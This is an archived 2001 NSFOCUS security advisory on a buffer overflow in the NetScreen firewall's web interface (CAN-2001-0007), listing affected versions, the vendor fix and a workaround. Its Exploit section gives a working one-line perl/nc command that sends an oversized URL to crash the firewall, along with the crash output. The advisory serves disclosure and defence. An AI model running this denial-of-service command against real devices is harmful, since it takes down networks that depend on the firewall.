The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


NSFOCUS SA2001-01: NetScreen Firewall WebUI Buffer Overflow vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 9 Jan 2001 12:55:36 +0800
From: Nsfocus Security Team <security@NSFOCUS.COM.>
To: [email protected]
Subject: NSFOCUS SA2001-01: NetScreen Firewall WebUI Buffer Overflow vulnerability

NSFOCUS Security Advisory(SA2001-01)

Topic:  NetScreen Firewall WebUI Buffer Overflow vulnerability

Release Date=A3=BA Jan 9th, 2001

CVE Candidate Numbers: CAN-2001-0007

Affected system:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

ScreenOS release 1.73r1 on the NetScreen-1000
ScreenOS release 2.01r6 on the NetScreen-10/100
ScreenOS release 2.10r3 on the NetScreen-5
ScreenOS release 2.5r1  on the NetScreen-5/10/100

Non-affected system=A3=BA
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

ScreenOS release 1.73r2 on the NetScreen-1000
ScreenOS release 2.01r7 on the NetScreen-10/100
ScreenOS release 2.10r4 on the NetScreen-5
ScreenOS release 2.5r2  on the NetScreen-5/10/100

Impact:
=3D=3D=3D=3D=3D=3D=3D=3D=3D

NSFOCUS security team has found a buffer overflow vulnerability=
 in
NetScreen Firewall WebUI. Exploitation of this vulnerability,
malicious user can launch remote DoS attack to crash the=
 firewall.

Description=A3=BA
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

NetScreen Firewall is a popular commercial firewall. It has a Web=

administration interface (default listening at port 80) that=
 allows
firewall administrator to configure firewall with browser.=
 However,
it is lack of length check-up of input URL. Provided with a=
 oversized
URL request, a buffer overflow may take place that will crash the=

NetScreen firewall. In that case, all connections through=
 firewall
will be dropped, and the firewall won't response to any=
 connection
request. Rebooting the firewall is required to regain its=
 functions.

Attackers can launch attack without logining firewall.

All current versions of ScreeOS, including 1.73r1, 2.0r6, 2.1r3=
 and
2.5r1 are affected by this vulnerability on occasion that WebUI=
 has
been enabled .


Exploit:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Once the input URL is longer than 1220 bytes=A3=ACNetScreen firewall=
 will
crash:

$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc=
 netscreen_firewall 80

Following information will appear on firewall console=A3=BA

****************************** EXCEPTION=
 ******************************

Bus error execption (data reference: load or store)

EPC   =3D 0x8009AA1C,   SR    =3D 0x34501007,   Cause =3D 0x0080001C

Firewall halts now.


Workaround:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Disable WebUI management or appoint trusted administration host=
 before
acquirement and installation of relevant patch.

Vendor Status:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

We have notified NetScreen of this vulnerability on 12/19/2000 .=

On 12/26/2000 NetScreen has issued following ScreenOS release=
 versions
to fix the bug:

ScreenOS 1.73r2  on the NetScreen-1000
ScreenOS 2.10r4  on the NetScreen-5
ScreenOS 2.01r7  on the NetScreen-10/100
ScreenOS 2.5.0r2 on the NetScreen-5/10/100

Latest software are available at:
http://www.netscreen.com/support/updates.html
You can also contact NetScreen Technical Support Center
(mailto:support@netscreen.com.) for upgraded software.

Additional Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0007 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems.  Candidates
may change significantly before they become official CVE=
 entries.

DISCLAIMS:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT=
 WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR=
 IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL=
 NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,=

INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL=
 DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH=
 DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT=
 THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com.>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру